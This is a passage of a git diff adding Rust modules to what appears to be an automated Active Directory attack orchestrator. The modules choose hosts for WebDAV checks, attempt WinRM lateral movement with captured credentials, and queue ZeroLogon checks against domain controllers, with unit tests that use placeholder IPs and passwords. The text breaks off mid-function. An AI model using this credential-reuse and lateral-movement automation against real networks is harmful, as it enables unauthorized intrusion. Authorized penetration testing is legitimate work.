state.discovered_vulnerabilities.contains_key(&vuln_id) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(WebDavWork { + dedup_key, + vuln_id, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Checks discovered hosts for WebDAV service and registers vulnerabilities. +/// Interval: 45s. +pub async fn auto_webdav_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("webdav_detection") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_webdav_work(&state) + }; + + for item in work { + // Dispatch a recon task to verify WebDAV is accessible + let payload = json!({ + "technique": "webdav_check", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("webdav_detection"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "WebDAV detection check dispatched" + ); + + // Also register the vuln proactively (service tag is strong signal) + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: item.vuln_id, + vuln_type: "webdav_enabled".to_string(), + target: item.target_ip.clone(), + discovered_by: "auto_webdav_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert( + "hostname".to_string(), + serde_json::Value::String(item.hostname.clone()), + ); + d.insert( + "domain".to_string(), + serde_json::Value::String(item.domain.clone()), + ); + d.insert( + "target_ip".to_string(), + serde_json::Value::String(item.target_ip.clone()), + ); + d + }, + recommended_agent: "coercion".to_string(), + priority: 4, + }; + + let _ = dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await; + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WEBDAV_DETECTION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WEBDAV_DETECTION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "WebDAV detection deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch WebDAV detection"); + } + } + } + } +} + +struct WebDavWork { + dedup_key: String, + vuln_id: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("webdav:{}", "192.168.58.22"); + assert_eq!(key, "webdav:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WEBDAV_DETECTION, "webdav_detection"); + } + + #[test] + fn webdav_service_detection_webdav() { + let services = ["80/tcp webdav".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_iis() { + let services = ["80/tcp iis httpd".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_http() { + let services = ["80/tcp http".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn no_webdav_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "webdav_enabled_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "web01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn webdav_service_detection_webclient() { + let services = ["WebClient service running".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_case_insensitive() { + let services = ["80/TCP WEBDAV".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_not_port_80_without_http() { + // Port 80 alone without "http" keyword should not match + let services = ["80/tcp other_service".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn domain_from_hostname_bare() { + let hostname = "web01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_hostname_subdomain() { + let hostname = "web01.child.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "child.contoso.local"); + } + + #[test] + fn vuln_id_format_various_ips() { + let ips = ["192.168.58.10", "192.168.58.22", "192.168.58.240"]; + for ip in ips { + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert!(vuln_id.starts_with("webdav_enabled_")); + assert!(!vuln_id.contains('.')); + } + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!(cred_domain.to_lowercase(), domain); + } + + #[test] + fn credential_domain_matching_empty_domain() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + // When domain is empty, the first branch should fail and fall through + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain; + assert!(!matches); + } + + #[test] + fn webdav_vuln_details_construction() { + let hostname = "web01.contoso.local".to_string(); + let domain = "contoso.local".to_string(); + let target_ip = "192.168.58.22".to_string(); + let mut d = std::collections::HashMap::new(); + d.insert( + "hostname".to_string(), + serde_json::Value::String(hostname.clone()), + ); + d.insert( + "domain".to_string(), + serde_json::Value::String(domain.clone()), + ); + d.insert( + "target_ip".to_string(), + serde_json::Value::String(target_ip.clone()), + ); + assert_eq!(d.len(), 3); + assert_eq!(d["hostname"], serde_json::json!("web01.contoso.local")); + assert_eq!(d["domain"], serde_json::json!("contoso.local")); + assert_eq!(d["target_ip"], serde_json::json!("192.168.58.22")); + } + + #[test] + fn webdav_payload_structure() { + let payload = serde_json::json!({ + "technique": "webdav_check", + "target_ip": "192.168.58.22", + "hostname": "web01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "webdav_check"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "web01.contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn empty_services_no_webdav() { + let services: Vec = vec![]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + // --- collect_webdav_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_host( + ip: &str, + hostname: &str, + is_dc: bool, + services: Vec, + ) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services, + is_dc, + owned: false, + } + } + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_webdav_and_creds_produces_work() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "web01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "webdav:192.168.58.22"); + assert_eq!(work[0].vuln_id, "webdav_enabled_192_168_58_22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_host_without_webdav_services() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["445/tcp microsoft-ds".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_WEBDAV_DETECTION, "webdav:192.168.58.22".into()); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_registered_vuln() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.discovered_vulnerabilities.insert( + "webdav_enabled_192_168_58_22".to_string(), + ares_core::models::VulnerabilityInfo { + vuln_id: "webdav_enabled_192_168_58_22".to_string(), + vuln_type: "webdav_enabled".to_string(), + target: "192.168.58.22".to_string(), + discovered_by: "test".to_string(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".to_string(), + priority: 4, + }, + ); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_extracts_domain_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.30", + "web01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state + .credentials + .push(make_cred("svc_web", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["WebClient service running".to_string()], + )); + // First cred is fabrikam, second is contoso (matching host domain) + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + state + .credentials + .push(make_cred("user_con", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_con"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_cred_when_no_domain_match() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Only fabrikam creds, host is contoso + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_fab"); + } + + #[test] + fn collect_bare_hostname_falls_back_to_first_cred() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01", + false, + vec!["80/tcp webdav".to_string()], + )); + state + .credentials + .push(make_cred("fallback_user", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + // bare hostname has empty domain, so domain match fails; falls back to first + assert_eq!(work[0].credential.username, "fallback_user"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + // Good: member server with webdav + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: DC + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: no webdav service + state.hosts.push(make_host( + "192.168.58.40", + "sql01.contoso.local", + false, + vec!["1433/tcp ms-sql-s".to_string()], + )); + // Good: IIS server + state.hosts.push(make_host( + "192.168.58.50", + "ws01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 2); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[1].target_ip, "192.168.58.50"); + } +} diff --git a/ares-cli/src/orchestrator/automation/winrm_lateral.rs b/ares-cli/src/orchestrator/automation/winrm_lateral.rs new file mode 100644 index 00000000..ffa42ab6 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/winrm_lateral.rs @@ -0,0 +1,537 @@ +//! auto_winrm_lateral -- attempt WinRM lateral movement with owned credentials. +//! +//! WinRM (port 5985/5986) is a common lateral movement vector in AD environments. +//! evil-winrm provides PowerShell remoting access when credentials are valid and +//! the user has remote management rights. This module dispatches WinRM access +//! attempts against hosts where we have credentials but haven't tried WinRM yet. +//! +//! WinRM complements SMB-based lateral movement (psexec/wmiexec) by working even +//! when SMB is restricted or firewall-filtered. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect WinRM lateral movement work items from current state. +/// +/// Pure logic extracted from `auto_winrm_lateral` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_winrm_lateral_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Check if host has WinRM indicators in services + let has_winrm = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + + if !has_winrm { + continue; + } + + // Skip hosts we already own via secretsdump + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("winrm:{}", host.ip); + if state.is_processed(DEDUP_WINRM_LATERAL, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(WinRmWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Attempts WinRM lateral movement against hosts with owned credentials. +/// Interval: 45s. +pub async fn auto_winrm_lateral(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("winrm_lateral") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_winrm_lateral_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "winrm_exec", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("winrm_lateral"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "WinRM lateral movement dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WINRM_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WINRM_LATERAL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "WinRM lateral deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch WinRM lateral"); + } + } + } + } +} + +struct WinRmWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, services: Vec) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services, + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("winrm:{}", "192.168.58.22"); + assert_eq!(key, "winrm:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WINRM_LATERAL, "winrm_lateral"); + } + + #[test] + fn winrm_service_detection() { + let services = [ + "5985/tcp microsoft-httpapi".to_string(), + "445/tcp microsoft-ds".to_string(), + ]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(has_winrm); + } + + #[test] + fn winrm_https_service_detection() { + let services = ["5986/tcp ssl/http".to_string()]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(has_winrm); + } + + #[test] + fn no_winrm_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "winrm_exec", + "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "winrm_exec"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = WinRmWork { + dedup_key: "winrm:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "winrm:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn winrm_service_detection_variations() { + let test_cases = vec![ + (vec!["5985/tcp http".to_string()], true), + (vec!["5986/tcp ssl/http".to_string()], true), + (vec!["winrm-service".to_string()], true), + (vec!["WinRM".to_string()], true), + (vec!["445/tcp smb".to_string()], false), + (vec!["3389/tcp rdp".to_string()], false), + ]; + + for (services, expected) in test_cases { + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert_eq!( + has_winrm, expected, + "Services {:?} should have winrm={expected}", + services + ); + } + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "web01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn empty_services() { + let services: Vec = vec![]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm, "Empty services should not detect WinRM"); + } + + // --- collect_winrm_lateral_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_winrm_hosts_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["445/tcp smb".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_winrm_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "winrm:192.168.58.30"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_WINRM_LATERAL, "winrm:192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.hosts.push(make_host( + "192.168.58.31", + "web01.contoso.local", + vec!["5986/tcp ssl/http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.30")); + assert!(ips.contains(&"192.168.58.31")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_bare_hostname() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + // Bare hostname -> empty domain -> falls back to first cred + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + } + let state = shared.read().await; + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } +} diff --git a/ares-cli/src/orchestrator/automation/zerologon.rs b/ares-cli/src/orchestrator/automation/zerologon.rs new file mode 100644 index 00000000..128dd633 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/zerologon.rs @@ -0,0 +1,269 @@ +//! auto_zerologon -- check domain controllers for CVE-2020-1472 (ZeroLogon). +//! +//! ZeroLogon allows unauthenticated privilege escalation by exploiting a flaw +//! in the Netlogon protocol. Even on patched systems, the check is fast and +//! non-destructive. Dispatches `zerologon_check` (recon only, no exploit) +//! against each discovered DC once. +//! +//! If the check reports the DC is vulnerable, result processing will register +//! a "zerologon" vulnerability that other modules can act on. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_zerologon_work(state: &StateInner) -> Vec { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| !state.is_processed(DEDUP_ZEROLOGON, dc_ip)) + .map(|(domain, dc_ip)| { + // Derive the DC hostname (NetBIOS name) from hosts or domain + let hostname = state + .hosts + .iter() + .find(|h| h.ip == *dc_ip) + .map(|h| h.hostname.clone()) + .unwrap_or_default(); + + ZerologonWork { + domain: domain.clone(), + dc_ip: dc_ip.clone(), + hostname, + } + }) + .collect() +} + +/// Monitors for domain controllers and dispatches ZeroLogon checks. +/// Interval: 45s. +pub async fn auto_zerologon(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("zerologon") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_zerologon_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "zerologon_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "hostname": item.hostname, + }); + + let priority = dispatcher.effective_priority("zerologon"); + match dispatcher + 